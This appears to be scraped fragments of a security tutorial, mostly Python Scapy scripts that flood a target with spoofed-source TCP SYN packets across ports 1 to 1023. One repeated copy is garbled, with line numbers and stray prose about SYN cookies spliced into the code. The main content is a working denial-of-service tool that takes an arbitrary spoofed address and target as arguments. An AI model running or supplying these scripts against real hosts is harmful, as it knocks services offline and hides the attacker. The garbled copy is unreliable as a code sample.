import sys from scapy.all import TCP, IP, srflood packet = IP(src="192.168.65.131", dst="192.168.65.1") / TCP(dport=80, flags="S") srflood(packet)
#!/usr/bin/python import sys from scapy.all import srflood, IP, TCP if len(sys.argv) < 3: print sys.argv[0] + " <spoofed_source_ip> <target>" sys.exit(0) packet = IP(src=sys.argv[1], dst=sys.argv[2]) / \ TCP(dport=range(1,1024), flags="S") srflood(packet, store=0)
1 #!/usr/bin/python Luckily nowadaysSYN floodingattacks are not such a big deal anymoreas they were a decade ago. On Linux you can activate SYN cookies by executingthe following: echo 1 > /proc/sys/net/ipv4/tcp_syncookies 2 3 import sys 4 from scapy.all import srflood, IP, TCP 5 6 if len(sys.argv) < 3: 7 print sys.argv[0] + " <spoofed_source_ip> <target>" 8 sys.exit(0) 9 10 packet = IP(src=sys.argv[1], dst=sys.argv[2]) / \ 11 TCP(dport=range(1,1024), flags="S") 12 13 srflood(packet, store=0)